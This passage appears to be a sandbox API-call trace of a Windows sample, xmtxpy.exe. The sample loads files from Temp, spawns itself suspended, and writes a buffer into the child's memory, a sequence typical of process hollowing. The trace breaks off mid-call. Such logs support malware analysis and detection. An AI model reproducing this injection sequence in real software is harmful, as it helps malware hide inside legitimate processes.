¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿñt&£Üþ\x19", lpUsedDefaultChar=0x0) returned 256 [0189.222] GetLastError () returned 0x0 [0189.222] SetLastError (dwErrCode=0x0) [0189.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0189.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫝ĎĀ") returned 256 [0189.222] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫝ĎĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0189.222] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫝ĎĀ", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0189.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿñt&£Üþ\x19", lpUsedDefaultChar=0x0) returned 256 [0189.222] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x80) returned 0x4e0a00 [0189.222] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x800) returned 0x4ede58 [0189.222] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0189.222] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x10de9e1) returned 0x0 [0189.222] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4e0a00) returned 0x80 [0189.223] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\npotbzd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0189.223] GetFileSize (in: hFile=0x1d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12fa [0189.223] VirtualAlloc (lpAddress=0x0, dwSize=0x12fa, flAllocationType=0x3000, flProtect=0x40) returned 0x4a0000 [0189.223] ReadFile (in: hFile=0x1d8, lpBuffer=0x4a0000, nNumberOfBytesToRead=0x12fa, lpNumberOfBytesRead=0x19ff20, lpOverlapped=0x0 | out: lpBuffer=0x4a0000*, lpNumberOfBytesRead=0x19ff20*=0x12fa, lpOverlapped=0x0) returned 1 [0189.225] LoadLibraryW (lpLibFileName="Shlwapi.dll") returned 0x77590000 [0189.225] GetTempPathW (in: nBufferLength=0x103, lpBuffer=0x19fa9c | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0189.225] PathAppendW (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", pMore="2v0cucir72x" | out: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2v0cucir72x") returned 1 [0189.225] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2v0cucir72x" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2v0cucir72x"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0189.225] GetFileSize (in: hFile=0x1dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x359d8 [0189.225] VirtualAlloc (lpAddress=0x0, dwSize=0x359d8, flAllocationType=0x3000, flProtect=0x4) returned 0x9d0000 [0189.226] ReadFile (in: hFile=0x1dc, lpBuffer=0x9d0000, nNumberOfBytesToRead=0x359d8, lpNumberOfBytesRead=0x19feac, lpOverlapped=0x0 | out: lpBuffer=0x9d0000*, lpNumberOfBytesRead=0x19feac*=0x359d8, lpOverlapped=0x0) returned 1 [0189.230] CloseHandle (hObject=0x1dc) returned 1 [0189.754] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77b90000 [0189.755] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f5a0, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe")) returned 0x2f [0189.755] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19ee1c, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe")) returned 0x2f [0189.755] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" [0189.755] CreateProcessW (in: lpApplicationName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe", lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f4f8*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f55c | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd", lpProcessInformation=0x19f55c*(hProcess=0x1e0, hThread=0x1dc, dwProcessId=0x1248, dwThreadId=0x125c)) returned 1 [0189.926] GetThreadContext (in: hThread=0x1dc, lpContext=0x19f22c | out: lpContext=0x19f22c*(ContextFlags=0x10007, Dr0=0x6328517d, Dr1=0xfffffffe, Dr2=0xd60002d4, Dr3=0x77bc2e9b, Dr6=0x42, Dr7=0x50, FloatSave.ControlWord=0x4d02bc, FloatSave.StatusWord=0x19f270, FloatSave.TagWord=0x19f360, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x42, FloatSave.DataOffset=0x50, FloatSave.DataSelector=0x4d0000, FloatSave.RegisterArea=([0]=0xf0, [1]=0xa8, [2]=0x4e, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0xa, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xff, [13]=0x7, [14]=0x0, [15]=0x0, [16]=0xf0, [17]=0x0, [18]=0x9d, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x1, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x25, [33]=0x2, [34]=0x0, [35]=0xc0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xb8, [45]=0xf2, [46]=0x19, [47]=0x0, [48]=0xd4, [49]=0x2, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x14, [57]=0x2, [58]=0x4e, [59]=0x0, [60]=0x54, [61]=0x2, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x9d, [67]=0x0, [68]=0x0, [69]=0xf5, [70]=0x19, [71]=0x0, [72]=0xf8, [73]=0xa8, [74]=0x4e, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x4d2540, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x273000, Edx=0x0, Ecx=0x0, Eax=0x10de9d7, Ebp=0x0, Eip=0x77c08fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0xe0, [1]=0xf4, [2]=0x19, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x25, [9]=0x2, [10]=0x0, [11]=0xc0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x20, [17]=0xf3, [18]=0x19, [19]=0x0, [20]=0x2b, [21]=0xba, [22]=0xbc, [23]=0x77, [24]=0xa8, [25]=0xf3, [26]=0x19, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x9, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x70, [41]=0xf3, [42]=0x19, [43]=0x0, [44]=0x33, [45]=0xb8, [46]=0xbc, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x59, [53]=0xb8, [54]=0xbc, [55]=0x77, [56]=0xf5, [57]=0xbd, [58]=0xf9, [59]=0x14, [60]=0xe8, [61]=0xf4, [62]=0x19, [63]=0x0, [64]=0x78, [65]=0xf5, [66]=0x19, [67]=0x0, [68]=0xe0, [69]=0xf4, [70]=0x19, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x84, [77]=0xf4, [78]=0x19, [79]=0x0, [80]=0xa8, [81]=0xf3, [82]=0x19, [83]=0x0, [84]=0xe8, [85]=0xf4, [86]=0x19, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x30, [97]=0xf3, [98]=0x19, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x70, [105]=0xff, [106]=0x19, [107]=0x0, [108]=0x30, [109]=0xee, [110]=0xc0, [111]=0x77, [112]=0xad, [113]=0x6f, [114]=0x28, [115]=0x63, [116]=0xfe, [117]=0xff, [118]=0xff, [119]=0xff, [120]=0x59, [121]=0xb8, [122]=0xbc, [123]=0x77, [124]=0x9e, [125]=0x1, [126]=0xbd, [127]=0x77, [128]=0x20, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x4, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0xe0, [145]=0xf4, [146]=0x19, [147]=0x0, [148]=0xa4, [149]=0xf3, [150]=0x19, [151]=0x0, [152]=0x1, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x78, [157]=0xf5, [158]=0x19, [159]=0x0, [160]=0xc0, [161]=0x1, [162]=0xbd, [163]=0x77, [164]=0x5c, [165]=0xf4, [166]=0x19, [167]=0x0, [168]=0x20, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x12, [177]=0x0, [178]=0x0, [179]=0x1, [180]=0xb0, [181]=0xf3, [182]=0x19, [183]=0x0, [184]=0x6e, [185]=0x0, [186]=0x74, [187]=0x0, [188]=0x64, [189]=0x0, [190]=0x6c, [191]=0x0, [192]=0x6c, [193]=0x0, [194]=0x2e, [195]=0x0, [196]=0x64, [197]=0x0, [198]=0x6c, [199]=0x0, [200]=0x6c, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xc0, [205]=0x0, [206]=0xa8, [207]=0x0, [208]=0x40, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0xb4, [273]=0xf4, [274]=0x19, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x16, [281]=0x0, [282]=0x18, [283]=0x0, [284]=0xf0, [285]=0xfe, [286]=0x19, [287]=0x0, [288]=0x88, [289]=0xf5, [290]=0x19, [291]=0x0, [292]=0xb0, [293]=0xf4, [294]=0x19, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0xc8, [301]=0xf4, [302]=0x19, [303]=0x0, [304]=0xd9, [305]=0x98, [306]=0xb7, [307]=0x76, [308]=0x88, [309]=0x65, [310]=0xbc, [311]=0x77, [312]=0x36, [313]=0x1a, [314]=0xfd, [315]=0x7f, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x2, [323]=0x0, [324]=0x50, [325]=0xf4, [326]=0x19, [327]=0x0, [328]=0x50, [329]=0xf4, [330]=0x19, [331]=0x0, [332]=0x50, [333]=0xf4, [334]=0x19, [335]=0x0, [336]=0x2, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0xfd, [347]=0x7f, [348]=0xd9, [349]=0xba, [350]=0xf9, [351]=0x14, [352]=0xd4, [353]=0xf5, [354]=0x19, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0xb5, [361]=0x93, [362]=0xbc, [363]=0x77, [364]=0xfc, [365]=0xf4, [366]=0x19, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x2c, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x70, [377]=0xfa, [378]=0x19, [379]=0x0, [380]=0xf0, [381]=0xfe, [382]=0x19, [383]=0x0, [384]=0x30, [385]=0x94, [386]=0xbc, [387]=0x77, [388]=0xb5, [389]=0x74, [390]=0xb8, [391]=0x76, [392]=0xe8, [393]=0xf6, [394]=0x0, [395]=0x1, [396]=0x16, [397]=0x0, [398]=0x18, [399]=0x0, [400]=0xf0, [401]=0xfe, [402]=0x19, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x38, [429]=0xfa, [430]=0x19, [431]=0x0, [432]=0x9c, [433]=0xb7, [434]=0xbc, [435]=0x77, [436]=0xe8, [437]=0xf4, [438]=0x19, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x19, [445]=0xbd, [446]=0xf9, [447]=0x14, [448]=0x1, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x40, [453]=0xf5, [454]=0x19, [455]=0x0, [456]=0x1, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0xcd, [469]=0x35, [470]=0xbd, [471]=0x77, [472]=0xd7, [473]=0xe9, [474]=0xd, [475]=0x1, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x9, [481]=0x36, [482]=0xbd, [483]=0x77, [484]=0xf8, [485]=0xf6, [486]=0x19, [487]=0x0, [488]=0x40, [489]=0x25, [490]=0x4d, [491]=0x0, [492]=0x6c, [493]=0xf5, [494]=0x19, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x38, [509]=0xfa, [510]=0x19, [511]=0x0))) returned 1 [0189.933] ReadProcessMemory (in: hProcess=0x1e0, lpBaseAddress=0x273008, lpBuffer=0x19f570, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19f570*, lpNumberOfBytesRead=0x0) returned 1 [0189.933] VirtualAllocEx (hProcess=0x1e0, lpAddress=0x400000, dwSize=0xa2000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0194.759] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19edb4 | out: Wow64Process=0x19edb4*=1) returned 1 [0194.771] lstrlenW (lpString="xmtxpy.exe") returned 10 [0194.772] lstrlenW (lpString="ntdll.dll") returned 9 [0194.772] lstrlenW (lpString="ntdll.dll") returned 9 [0194.772] lstrlenW (lpString="ntdll.dll") returned 9 [0194.772] lstrlenW (lpString="ntdll.dll") returned 9 [0194.772] lstrlenW (lpString="tdll.dll") returned 8 [0194.772] lstrlenW (lpString="dll.dll") returned 7 [0194.772] lstrlenW (lpString="ll.dll") returned 6 [0194.772] lstrlenW (lpString="l.dll") returned 5 [0194.772] lstrlenW (lpString=".dll") returned 4 [0194.772] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0194.775] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0194.775] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xf30000 [0194.776] ReadFile (in: hFile=0x1e8, lpBuffer=0xf30000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ed88, lpOverlapped=0x0 | out: lpBuffer=0xf30000*, lpNumberOfBytesRead=0x19ed88*=0x1784a0, lpOverlapped=0x0) returned 1 [0195.476] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000 [0196.297] CloseHandle (hObject=0x1e8) returned 1 [0196.298] VirtualFree (lpAddress=0xf30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.859] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.524] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x400000, Buffer=0x9d0000*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x19ede8 | out: Buffer=0x9d0000*, NumberOfBytesWritten=0x19ede8*=0x400) returned 0x0 [0201.419] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19edb4 | out: Wow64Process=0x19edb4*=1) returned 1 [0201.419] lstrlenW (lpString="xmtxpy.exe") returned 10 [0201.420] lstrlenW (lpString="ntdll.dll") returned 9 [0201.420] lstrlenW (lpString="ntdll.dll") returned 9 [0201.420] lstrlenW (lpString="ntdll.dll") returned 9 [0201.420] lstrlenW (lpString="ntdll.dll") returned 9 [0201.420] lstrlenW (lpString="tdll.dll") returned 8 [0201.420] lstrlenW (lpString="dll.dll") returned 7 [0201.420] lstrlenW (lpString="ll.dll") returned 6 [0201.420] lstrlenW (lpString="l.dll") returned 5 [0201.420] lstrlenW (lpString=".dll") returned 4 [0201.420] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0201.421] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0201.421] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xf30000 [0201.422] ReadFile (in: hFile=0x1e8, lpBuffer=0xf30000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ed88, lpOverlapped=0x0 | out: lpBuffer=0xf30000*, lpNumberOfBytesRead=0x19ed88*=0x1784a0, lpOverlapped=0x0) returned 1 [0201.745] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000 [0202.055] CloseHandle (hObject=0x1e8) returned 1 [0202.056] VirtualFree (lpAddress=0xf30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.275] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.908] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x401000, 